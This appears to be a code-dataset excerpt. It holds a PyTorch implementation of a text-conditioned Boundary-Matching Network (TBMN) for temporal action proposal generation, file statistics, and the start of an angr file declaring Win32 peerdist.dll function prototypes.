sample_tmin = p_tmin - (center_len * self.boundary_ratio)
sample_tmax = p_tmax + (center_len * self.boundary_ratio)
p_mask = self._get_interp1d_bin_mask(
sample_tmin, sample_tmax, self.tscale,
self.num_samples, self.num_samples_per_bin)
else:
p_mask = np.zeros([self.tscale, self.num_samples])
mask_mat_vector.append(p_mask)
mask_mat_vector = np.stack(mask_mat_vector, axis=2)
mask_mat.append(mask_mat_vector)
mask_mat = np.stack(mask_mat, axis=3)
mask_mat = mask_mat.astype(np.float32)
self.sample_mask = nn.Parameter(
torch.tensor(mask_mat).view(self.tscale, -1), requires_grad=False)
def _get_bm_mask(self):
"""Generate Boundary-Matching Mask."""
bm_mask = []
for idx in range(self.tscale):
mask_vector = [1] * (self.tscale - idx) + [0] * idx
bm_mask.append(mask_vector)
bm_mask = torch.tensor(bm_mask, dtype=torch.float)
return bm_mask
class TransformerEncoder(nn.Module):
def __init__(self, pretrained_transformers, freeze=False, layers=6, final_channel_number=768):
super().__init__()
self.model = AutoModel.from_pretrained(pretrained_transformers)
self.model.encoder.layer = self.model.encoder.layer[:layers]
self.model.embeddings.word_embeddings = None
self.embeddings = self.model.embeddings
self.model = self.model.encoder
self.norm = nn.LayerNorm(final_channel_number)
if freeze:
self.model.eval()
for p in self.model.parameters():
p.requires_grad = False #预训练模型加载进来后全部设置为不更新参数,然后再后面加层
def forward(self,
embedding_input,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
past_key_values=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=True,
):
embedding_input_with_position = self.embeddings(inputs_embeds=embedding_input)
output = self.model(
embedding_input_with_position,
attention_mask=attention_mask,
head_mask=head_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
past_key_values=past_key_values,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
embedding_output = output[0]
embedding_output = self.norm(embedding_output)
return embedding_output
class TransformerDecoder(nn.Module):
def __init__(self, pretrained_transformers, freeze=False, layers=6, final_channel_number=768, replace_dict=[['roberta.', '']]):
super().__init__()
self.config = AutoConfig.from_pretrained(pretrained_transformers)
self.config.is_decoder=True
self.config.add_cross_attention=True
self.model = AutoModel.from_config(self.config)
self.init_weight(pretrained_transformers, replace_dict)
if freeze:
self.model.eval()
for p in self.model.parameters():
p.requires_grad = False #预训练模型加载进来后全部设置为不更新参数,然后再后面加层
self.model.encoder.layer = self.model.encoder.layer[:layers]
self.model.embeddings.word_embeddings = None
self.embeddings_q = self.model.embeddings
self.embeddings_kv = copy.deepcopy(self.embeddings_q)
self.model = self.model.encoder
self.norm = nn.LayerNorm(final_channel_number)
def init_weight(self, pretrained_transformers, replace_dict=[]):
state_dict = torch.load(os.path.join(pretrained_transformers, 'pytorch_model.bin'), map_location='cpu')
new_state_dict = OrderedDict()
for k, v in state_dict.items():
new_k = k
for raw_str, replace_str in replace_dict:
new_k = new_k.replace(raw_str, replace_str)
new_state_dict[new_k] = v
if '.attention.' in new_k:
new_k = new_k.replace('.attention.', '.crossattention.')
new_state_dict[new_k] = v
self.model.load_state_dict(new_state_dict, strict=False)
def forward(self,
embedding_input,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
past_key_values=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=True,
emb_q=False,
emb_kv=False,
):
if emb_q:
embedding_input_with_position = self.embeddings_q(inputs_embeds=embedding_input)
else:
embedding_input_with_position = embedding_input
if emb_kv:
encoder_hidden_states_with_position = self.embeddings_kv(inputs_embeds=encoder_hidden_states)
else:
encoder_hidden_states_with_position = encoder_hidden_states
output = self.model(
embedding_input_with_position,
attention_mask=attention_mask,
head_mask=head_mask,
encoder_hidden_states=encoder_hidden_states_with_position,
encoder_attention_mask=encoder_attention_mask,
past_key_values=past_key_values,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
extra_layer=self.embeddings_q,
)
embedding_output = output[0]
embedding_output = self.embeddings_q(inputs_embeds=embedding_output)
embedding_output = self.norm(embedding_output)
return embedding_output
class NLPModel(nn.Module):
def __init__(self, pretrained_nlp, layers=6, final_channel_number=768, max_length=64, freeze=False):
super().__init__()
self.nlp_model = AutoModel.from_pretrained(pretrained_nlp)
self.tokenizer = AutoTokenizer.from_pretrained(pretrained_nlp)
self.config = AutoConfig.from_pretrained(pretrained_nlp)
self.max_length = max_length
self.norm = nn.LayerNorm(final_channel_number)
self.nlp_model.encoder.layer = self.nlp_model.encoder.layer[:layers]
if freeze:
self.nlp_model.eval()
for p in self.nlp_model.parameters():
p.requires_grad = False #预训练模型加载进来后全部设置为不更新参数,然后再后面加层
def mean_pooling(self, model_output, attention_mask):
# model_output.shape = [bs, N, 768]
# attention_mask.shape = [bs, N]
embedding = model_output[0]
x = torch.sum(embedding * attention_mask[..., None], 1, keepdim=True) / (torch.sum(attention_mask[..., None], 1, keepdim=True)+1e-9)
return x
def forward(self, text, device):
encoded_input = self.tokenizer(text, padding=True, truncation=True, return_tensors='pt', max_length=self.max_length)
for key in encoded_input.keys():
encoded_input[key] = encoded_input[key].to(device)
model_output = self.nlp_model(**encoded_input)
output_global_feature = self.mean_pooling(model_output, encoded_input['attention_mask'])
output_global_feature = self.norm(output_global_feature)
output_feature = model_output[0]
input_mask = encoded_input['attention_mask']
return output_feature, input_mask, output_global_feature
@LOCALIZERS.register_module()
class TBMN(BaseLocalizer):
"""Boundary Matching Network for temporal action proposal generation.
Please refer `BMN: Boundary-Matching Network for Temporal Action Proposal
Generation <https://arxiv.org/abs/1907.09702>`_.
Code Reference https://github.com/JJBOY/BMN-Boundary-Matching-Network
Args:
temporal_dim (int): Total frames selected for each video.
boundary_ratio (float): Ratio for determining video boundaries.
num_samples (int): Number of samples for each proposal.
num_samples_per_bin (int): Number of bin samples for each sample.
feat_dim (int): Feature dimension.
soft_nms_alpha (float): Soft NMS alpha.
soft_nms_low_threshold (float): Soft NMS low threshold.
soft_nms_high_threshold (float): Soft NMS high threshold.
post_process_top_k (int): Top k proposals in post process.
feature_extraction_interval (int):
Interval used in feature extraction. Default: 16.
loss_cls (dict): Config for building loss.
Default: ``dict(type='BMNLoss')``.
hidden_dim_1d (int): Hidden dim for 1d conv. Default: 256.
hidden_dim_2d (int): Hidden dim for 2d conv. Default: 128.
hidden_dim_3d (int): Hidden dim for 3d conv. Default: 512.
"""
def __init__(self,
temporal_dim,
boundary_ratio,
num_samples,
num_samples_per_bin,
feat_dim,
soft_nms_alpha,
soft_nms_low_threshold,
soft_nms_high_threshold,
post_process_top_k,
vision_encoder=None,
language_encoder=None,
cross_feature_decoder=None,
feature_extraction_interval=16,
loss_cls=dict(type='BMNLoss'),
hidden_dim_1d=256,
hidden_dim_2d=128,
hidden_dim_3d=512,
):
super(BaseLocalizer, self).__init__()
self.tscale = temporal_dim
self.boundary_ratio = boundary_ratio
self.num_samples = num_samples
self.num_samples_per_bin = num_samples_per_bin
self.feat_dim = feat_dim
self.soft_nms_alpha = soft_nms_alpha
self.soft_nms_low_threshold = soft_nms_low_threshold
self.soft_nms_high_threshold = soft_nms_high_threshold
self.post_process_top_k = post_process_top_k
self.feature_extraction_interval = feature_extraction_interval
self.loss_cls = build_loss(loss_cls)
self.hidden_dim_1d = hidden_dim_1d
self.hidden_dim_2d = hidden_dim_2d
self.hidden_dim_3d = hidden_dim_3d
self.language_encoder = NLPModel(
pretrained_nlp=language_encoder['pretrained_language_encoder'],
)
self.convert_input_feature_dim = nn.Sequential(
nn.Linear(400, 768),
nn.LayerNorm(768),
)
self.cross_feature_decoder = TransformerDecoder(
pretrained_transformers=cross_feature_decoder['pretrained_cross_feature_decoder'],
freeze=cross_feature_decoder['freeze'],
layers=cross_feature_decoder['layers'],
final_channel_number=cross_feature_decoder['final_channel_number'],
replace_dict=cross_feature_decoder['replace_dict'],
)
# self.cross_feature_encoder = TransformerEncoder(
# pretrained_transformers=cross_feature_decoder['pretrained_cross_feature_decoder'],
# freeze=cross_feature_decoder['freeze'],
# layers=cross_feature_decoder['layers'],
# final_channel_number=cross_feature_decoder['final_channel_number'],
# # replace_dict=cross_feature_decoder['replace_dict'],
# )
self.convert_output_feature_dim = nn.Sequential(
nn.Linear(768, 400),
nn.LayerNorm(400),
)
self.x_s = nn.Sequential(nn.Conv1d(400, 400, kernel_size=3, padding=1, groups=4), nn.ReLU(inplace=True), nn.Conv1d(400, 1, kernel_size=1,), nn.Sigmoid())
self.x_e = nn.Sequential(nn.Conv1d(400, 400, kernel_size=3, padding=1, groups=4), nn.ReLU(inplace=True), nn.Conv1d(400, 1, kernel_size=1,), nn.Sigmoid())
self._get_interp1d_mask()
# Base Module
self.x_1d_b = nn.Sequential(
nn.Conv1d(
self.feat_dim,
self.hidden_dim_1d,
kernel_size=3,
padding=1,
groups=4), nn.ReLU(inplace=True),
nn.Conv1d(
self.hidden_dim_1d,
self.hidden_dim_1d,
kernel_size=3,
padding=1,
groups=4), nn.ReLU(inplace=True))
# Temporal Evaluation Module
self.x_1d_s = nn.Sequential(
nn.Conv1d(
self.hidden_dim_1d,
self.hidden_dim_1d,
kernel_size=3,
padding=1,
groups=4), nn.ReLU(inplace=True),
nn.Conv1d(self.hidden_dim_1d, 1, kernel_size=1), nn.Sigmoid())
self.x_1d_e = nn.Sequential(
nn.Conv1d(
self.hidden_dim_1d,
self.hidden_dim_1d,
kernel_size=3,
padding=1,
groups=4), nn.ReLU(inplace=True),
nn.Conv1d(self.hidden_dim_1d, 1, kernel_size=1), nn.Sigmoid())
# Proposal Evaluation Module
self.x_1d_p = nn.Sequential(
nn.Conv1d(
self.hidden_dim_1d,
self.hidden_dim_1d,
kernel_size=3,
padding=1), nn.ReLU(inplace=True))
self.x_3d_p = nn.Sequential(
nn.Conv3d(
self.hidden_dim_1d,
self.hidden_dim_3d,
kernel_size=(self.num_samples, 1, 1)), nn.ReLU(inplace=True))
self.x_2d_p = nn.Sequential(
nn.Conv2d(self.hidden_dim_3d, self.hidden_dim_2d, kernel_size=1),
nn.ReLU(inplace=True),
nn.Conv2d(
self.hidden_dim_2d,
self.hidden_dim_2d,
kernel_size=3,
padding=1), nn.ReLU(inplace=True),
nn.Conv2d(
self.hidden_dim_2d,
self.hidden_dim_2d,
kernel_size=3,
padding=1), nn.ReLU(inplace=True),
nn.Conv2d(self.hidden_dim_2d, 2, kernel_size=1), nn.Sigmoid())
self.anchors_tmins, self.anchors_tmaxs = self._temporal_anchors(-0.5, 1.5)
self.match_map = self._match_map()
self.bm_mask = self._get_bm_mask()
def _match_map(self):
"""Generate match map."""
temporal_gap = 1. / self.tscale
match_map = []
for idx in range(self.tscale):
match_window = []
tmin = temporal_gap * idx
for jdx in range(1, self.tscale + 1):
tmax = tmin + temporal_gap * jdx
match_window.append([tmin, tmax])
match_map.append(match_window)
match_map = np.array(match_map)
match_map = np.transpose(match_map, [1, 0, 2])
match_map = np.reshape(match_map, [-1, 2])
return match_map
def _temporal_anchors(self, tmin_offset=0., tmax_offset=1.):
"""Generate temporal anchors.
Args:
tmin_offset (int): Offset for the minimum value of temporal anchor.
Default: 0.
tmax_offset (int): Offset for the maximun value of temporal anchor.
Default: 1.
Returns:
tuple[Sequence[float]]: The minimum and maximum values of temporal
anchors.
"""
temporal_gap = 1. / self.tscale
anchors_tmins = []
anchors_tmaxs = []
for i in range(self.tscale):
anchors_tmins.append(temporal_gap * (i + tmin_offset))
anchors_tmaxs.append(temporal_gap * (i + tmax_offset))
return anchors_tmins, anchors_tmaxs
def _forward(self, x, video_meta, text=None):
"""Define the computation performed at every call.
Args:
x (torch.Tensor): The input data.
Returns:
torch.Tensor: The output of the module.
"""
# x.shape [batch_size, self.feat_dim, self.tscale]
if text is not None:
text = [text]
else:
text = [vm['text'] for vm in video_meta]
# 纯位置decoder
# x_tran = x.permute(0, 2, 1) # [bs, c, t] -> [bs, t, c]
# x_tran = self.convert_input_feature_dim(x_tran)
# position_feature = torch.zeros_like(x_tran)
# x_tran = self.cross_feature_decoder(position_feature, encoder_hidden_states=x_tran, emb_q=False, emb_kv=True)
# x_tran = self.convert_output_feature_dim(x_tran)
# x_tran = x_tran.permute(0, 2, 1) # [bs, t, c] -> [bs, c, t]
# start = self.x_s(x_tran).squeeze(1)
# end = self.x_e(x_tran).squeeze(1)
# decoder 模式
# text_feature, attention_mask, text_global_feature = self.language_encoder(text, x.device)
# query_text_global_feature = torch.repeat_interleave(text_global_feature, self.tscale, 1)
# res_x = x
# x = x.permute(0, 2, 1)
# x = self.convert_input_feature_dim(x)
# x = self.cross_feature_decoder(query_text_global_feature, encoder_hidden_states=x, emb_q=False, emb_kv=True)
# x = self.convert_output_feature_dim(x)
# x = x.permute(0, 2, 1)
# encoder 模式
# text_feature, text_mask, _ = self.language_encoder(text, x.device)
# vision_feature = x.permute(0, 2, 1)
# vision_feature = self.convert_input_feature_dim(vision_feature)
# vision_mask = torch.ones_like(vision_feature)[..., 0]
# mix_feature = torch.cat([vision_feature, text_feature], dim=1)
# mix_mask = torch.cat([vision_mask, text_mask], dim=1).float()
# mix_mask = (1 - mix_mask[:, None, None, :]) * -10000
# mix_feature = self.cross_feature_encoder(mix_feature, attention_mask=mix_mask)
# mix_feature = self.convert_output_feature_dim(mix_feature)
# mix_feature = mix_feature[:, :self.tscale]
# x = mix_feature.permute(0, 2, 1)
base_feature = self.x_1d_b(x)
# base_feature.shape [batch_size, self.hidden_dim_1d, self.tscale]
start = self.x_1d_s(base_feature).squeeze(1)
# start.shape [batch_size, self.tscale]
end = self.x_1d_e(base_feature).squeeze(1)
# end.shape [batch_size, self.tscale]
confidence_map = self.x_1d_p(base_feature)
# [batch_size, self.hidden_dim_1d, self.tscale]
confidence_map = self._boundary_matching_layer(confidence_map)
# [batch_size, self.hidden_dim_1d,, self.num_sampls, self.tscale, self.tscale] # noqa
confidence_map = self.x_3d_p(confidence_map).squeeze(2)
# [batch_size, self.hidden_dim_3d, self.tscale, self.tscale]
confidence_map = self.x_2d_p(confidence_map)
# [batch_size, 2, self.tscale, self.tscale]
return confidence_map, start, end
def _boundary_matching_layer(self, x):
"""Generate matching layer."""
input_size = x.size()
out = torch.matmul(x,
self.sample_mask).reshape(input_size[0],
input_size[1],
self.num_samples,
self.tscale, self.tscale)
return out
def forward_test(self, raw_feature, video_meta):
"""Define the computation performed at every call when testing."""
'''
proposal_list list[dict]: The updated proposals, e.g.
[{'score': 0.9, 'segment': [0, 1]},
{'score': 0.8, 'segment': [0, 2]},
...].
output = [
dict(
video_name=video_info['video_name'],
proposal_list=proposal_list)
]
'''
# all_text = np.array([vm['text'] for vm in video_meta])
all_text = np.array(video_meta[0]['text'])
all_text = np.unique(all_text)
proposal_list = []
for text in all_text:
confidence_map, start, end = self._forward(raw_feature, video_meta, text=text)
start_scores = start[0].cpu().numpy()
end_scores = end[0].cpu().numpy()
cls_confidence = (confidence_map[0][1]).cpu().numpy()
reg_confidence = (confidence_map[0][0]).cpu().numpy()
max_start = max(start_scores)
max_end = max(end_scores)
# generate the set of start points and end points
start_bins = np.zeros(len(start_scores))
start_bins[0] = 1 # [1,0,0...,0,0]
end_bins = np.zeros(len(end_scores))
end_bins[-1] = 1 # [0,0,0...,0,1]
for idx in range(1, self.tscale - 1):
if start_scores[idx] > start_scores[
idx + 1] and start_scores[idx] > start_scores[idx - 1]:
start_bins[idx] = 1
elif start_scores[idx] > (0.5 * max_start):
start_bins[idx] = 1
if end_scores[idx] > end_scores[
idx + 1] and end_scores[idx] > end_scores[idx - 1]:
end_bins[idx] = 1
elif end_scores[idx] > (0.5 * max_end):
end_bins[idx] = 1
# iterate through all combinations of start_index and end_index
new_proposals = []
for idx in range(self.tscale):
for jdx in range(self.tscale):
start_index = jdx
end_index = start_index + idx + 1
if end_index < self.tscale and start_bins[
start_index] == 1 and end_bins[end_index] == 1:
tmin = start_index / self.tscale
tmax = end_index / self.tscale
tmin_score = start_scores[start_index]
tmax_score = end_scores[end_index]
cls_score = cls_confidence[idx, jdx]
reg_score = reg_confidence[idx, jdx]
score = tmin_score * tmax_score * cls_score * reg_score
new_proposals.append([
tmin, tmax, tmin_score, tmax_score, cls_score,
reg_score, score
])
new_proposals = np.stack(new_proposals)
video_info = dict(video_meta[0])
proposal_list_text = post_processing(new_proposals, video_info,
self.soft_nms_alpha,
self.soft_nms_low_threshold,
self.soft_nms_high_threshold,
self.post_process_top_k,
self.feature_extraction_interval)
proposal_list_text = [ dict(score=proposal['score'], segment=proposal['segment'], class_text=text)
for proposal in proposal_list_text]
proposal_list += proposal_list_text
output = [
dict(
video_name=video_info['video_name'],
proposal_list=proposal_list)
]
return output
def forward_train(self, raw_feature, video_meta, label_confidence, label_start, label_end):
"""Define the computation performed at every call when training."""
confidence_map, start, end = self._forward(raw_feature, video_meta)
loss = self.loss_cls(confidence_map, start, end, label_confidence, label_start, label_end, self.bm_mask.to(raw_feature.device))
loss_dict = dict(loss=loss[0])
return loss_dict
def generate_labels(self, gt_bbox):
"""Generate training labels."""
match_score_confidence_list = []
match_score_start_list = []
match_score_end_list = []
for every_gt_bbox in gt_bbox:
gt_iou_map = []
for start, end in every_gt_bbox:
if isinstance(start, torch.Tensor):
start = start.numpy()
if isinstance(end, torch.Tensor):
end = end.numpy()
current_gt_iou_map = temporal_iou(self.match_map[:, 0],
self.match_map[:, 1], start,
end)
current_gt_iou_map = np.reshape(current_gt_iou_map,
[self.tscale, self.tscale])
gt_iou_map.append(current_gt_iou_map)
gt_iou_map = np.array(gt_iou_map).astype(np.float32)
gt_iou_map = np.max(gt_iou_map, axis=0)
gt_tmins = every_gt_bbox[:, 0]
gt_tmaxs = every_gt_bbox[:, 1]
gt_len_pad = 3 * (1. / self.tscale)
gt_start_bboxs = np.stack(
(gt_tmins - gt_len_pad / 2, gt_tmins + gt_len_pad / 2), axis=1)
gt_end_bboxs = np.stack(
(gt_tmaxs - gt_len_pad / 2, gt_tmaxs + gt_len_pad / 2), axis=1)
match_score_start = []
match_score_end = []
for anchor_tmin, anchor_tmax in zip(self.anchors_tmins,
self.anchors_tmaxs):
match_score_start.append(
np.max(
temporal_iop(anchor_tmin, anchor_tmax,
gt_start_bboxs[:, 0], gt_start_bboxs[:,
1])))
match_score_end.append(
np.max(
temporal_iop(anchor_tmin, anchor_tmax,
gt_end_bboxs[:, 0], gt_end_bboxs[:, 1])))
match_score_confidence_list.append(gt_iou_map)
match_score_start_list.append(match_score_start)
match_score_end_list.append(match_score_end)
match_score_confidence_list = torch.Tensor(match_score_confidence_list)
match_score_start_list = torch.Tensor(match_score_start_list)
match_score_end_list = torch.Tensor(match_score_end_list)
return (match_score_confidence_list, match_score_start_list,
match_score_end_list)
def forward(self,
raw_feature,
gt_bbox=None,
video_meta=None,
return_loss=True):
"""Define the computation performed at every call."""
if return_loss:
label_confidence, label_start, label_end = (
self.generate_labels(gt_bbox))
device = raw_feature.device
label_confidence = label_confidence.to(device)
label_start = label_start.to(device)
label_end = label_end.to(device)
return self.forward_train(raw_feature, video_meta, label_confidence, label_start, label_end)
return self.forward_test(raw_feature, video_meta)
@staticmethod
def _get_interp1d_bin_mask(seg_tmin, seg_tmax, tscale, num_samples,
num_samples_per_bin):
"""Generate sample mask for a boundary-matching pair."""
plen = float(seg_tmax - seg_tmin)
plen_sample = plen / (num_samples * num_samples_per_bin - 1.0)
total_samples = [
seg_tmin + plen_sample * i
for i in range(num_samples * num_samples_per_bin)
]
p_mask = []
for idx in range(num_samples):
bin_samples = total_samples[idx * num_samples_per_bin:(idx + 1) *
num_samples_per_bin]
bin_vector = np.zeros(tscale)
for sample in bin_samples:
sample_upper = math.ceil(sample)
sample_decimal, sample_down = math.modf(sample)
if 0 <= int(sample_down) <= (tscale - 1):
bin_vector[int(sample_down)] += 1 - sample_decimal
if 0 <= int(sample_upper) <= (tscale - 1):
bin_vector[int(sample_upper)] += sample_decimal
bin_vector = 1.0 / num_samples_per_bin * bin_vector
p_mask.append(bin_vector)
p_mask = np.stack(p_mask, axis=1)
return p_mask
def _get_interp1d_mask(self):
"""Generate sample mask for each point in Boundary-Matching Map."""
mask_mat = []
for start_index in range(self.tscale):
mask_mat_vector = []
for duration_index in range(self.tscale):
if start_index + duration_index < self.tscale:
p_tmin = start_index
p_tmax = start_index + duration_index
center_len = float(p_tmax - p_tmin) + 1
sample_tmin = p_tmin - (center_len * self.boundary_ratio)
sample_tmax = p_tmax + (center_len * self.boundary_ratio)
p_mask = self._get_interp1d_bin_mask(
sample_tmin, sample_tmax, self.tscale,
self.num_samples, self.num_samples_per_bin)
else:
p_mask = np.zeros([self.tscale, self.num_samples])
mask_mat_vector.append(p_mask)
mask_mat_vector = np.stack(mask_mat_vector, axis=2)
mask_mat.append(mask_mat_vector)
mask_mat = np.stack(mask_mat, axis=3)
mask_mat = mask_mat.astype(np.float32)
self.sample_mask = nn.Parameter(
torch.tensor(mask_mat).view(self.tscale, -1), requires_grad=False)
def _get_bm_mask(self):
"""Generate Boundary-Matching Mask."""
bm_mask = []
for idx in range(self.tscale):
mask_vector = [1] * (self.tscale - idx) + [0] * idx
bm_mask.append(mask_vector)
bm_mask = torch.tensor(bm_mask, dtype=torch.float)
return bm_mask
| 43.054428
| 161
| 0.58036
| 5,614
| 46,671
| 4.498575
| 0.064482
| 0.027796
| 0.027796
| 0.019006
| 0.874084
| 0.855593
| 0.829103
| 0.820867
| 0.819165
| 0.81667
| 0
| 0.018048
| 0.330419
| 46,671
| 1,083
| 162
| 43.094183
| 0.790112
| 0.157807
| 0
| 0.830424
| 0
| 0
| 0.006593
| 0.001538
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0399
| false
| 0
| 0.018703
| 0
| 0.097257
| 0.001247
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
996b79602b990fa581de48eba74d3240e5947e77
| 23,974
|
py
|
Python
|
angr/procedures/definitions/win32_peerdist.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
angr/procedures/definitions/win32_peerdist.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
angr/procedures/definitions/win32_peerdist.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
# pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("peerdist.dll")
prototypes = \
{
#
'PeerDistStartup': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["dwVersionRequested", "phPeerDist", "pdwSupportedVersion"]),
#
'PeerDistShutdown': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist"]),
#
'PeerDistGetStatus': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="PEERDIST_STATUS"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "pPeerDistStatus"]),
#
'PeerDistRegisterForStatusChangeNotification': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=False, label="PEERDIST_STATUS"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hCompletionPort", "ulCompletionKey", "lpOverlapped", "pPeerDistStatus"]),
#
'PeerDistUnregisterForStatusChangeNotification': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist"]),
#
'PeerDistServerPublishStream': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeLongLong(signed=False, label="UInt64"), SimTypePointer(SimStruct({"dwVersion": SimTypeInt(signed=False, label="UInt32"), "dwFlags": SimTypeInt(signed=False, label="UInt32")}, name="PEERDIST_PUBLICATION_OPTIONS", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "cbContentIdentifier", "pContentIdentifier", "cbContentLength", "pPublishOptions", "hCompletionPort", "ulCompletionKey", "phStream"]),
#
'PeerDistServerPublishAddToStream': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hStream", "cbNumberOfBytes", "pBuffer", "lpOverlapped"]),
#
'PeerDistServerPublishCompleteStream': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hStream", "lpOverlapped"]),
#
'PeerDistServerCloseStreamHandle': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hStream"]),
#
'PeerDistServerUnpublish': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "cbContentIdentifier", "pContentIdentifier"]),
#
